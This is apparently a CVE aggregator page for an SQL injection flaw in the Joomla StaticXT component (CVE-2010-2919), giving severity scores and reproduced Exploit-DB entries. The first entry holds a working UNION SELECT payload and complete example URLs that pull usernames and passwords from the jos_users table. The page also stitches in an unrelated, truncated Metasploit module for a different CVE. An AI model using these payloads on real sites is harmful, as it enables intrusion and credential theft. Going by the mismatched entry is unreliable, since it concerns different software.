CVE-2010-2919
published 2010-07-30
CVE-2010-2919: SQL injection vulnerability in the StaticXT (com_staticxt) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter…
Priority P3 | 45 | high | 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.4th percentile)
SQL injection vulnerability in the StaticXT (com_staticxt) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
No detection rules found.
Exploit-DB
Joomla! Component StaticXT - SQL Injection
exploitdb·2010-07-17
CVE-2010-2919 Joomla! Component StaticXT - SQL Injection
---
Joomla Component (com_staticxt) SQL Injection Vulnerability
Author : Palyo34 & KroNicKq
Homepage : http://www.1923turk.com
[+] Vulnerable File :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=1923[SQL]
[+] ExploiT :
union+select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
jos_users--
[+] G00gle Dork : :S
[+] Example :
http://www.site.com/index.php?option=com_staticxt&staticfile=test.php&id=-1923+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
[+] Demo :
http://www.site.com/index.php?option=com_staticxt&staticfile=test1.php&id=-79+union select+concat_ws(0x3a,username,password),2,3,4,5,6,7,8,9,10,11,12+from+jos_users
...:: Onurlu
Exploit-DB
FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2007-2919 FlipViewer FViewerLoading - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: ebook_flipviewer_fviewerloading.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'FlipViewer FViewerLoading ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in E-BOOK Systems FlipViewer 4.0.
The vulnerability is caused due to a boundary error in the
FViewerLoading (FlipViewerX.dll) ActiveX control when handling the
"LoadOpf()" method.
},
'License' => BSD_LICENSE,
'Author
No writeups or analysis indexed.
http://packetstormsecurity.org/1007-exploits/joomlastaticxt-sql.txt
http://www.exploit-db.com/exploits/14395
https://exchange.xforce.ibmcloud.com/vulnerabilities/60462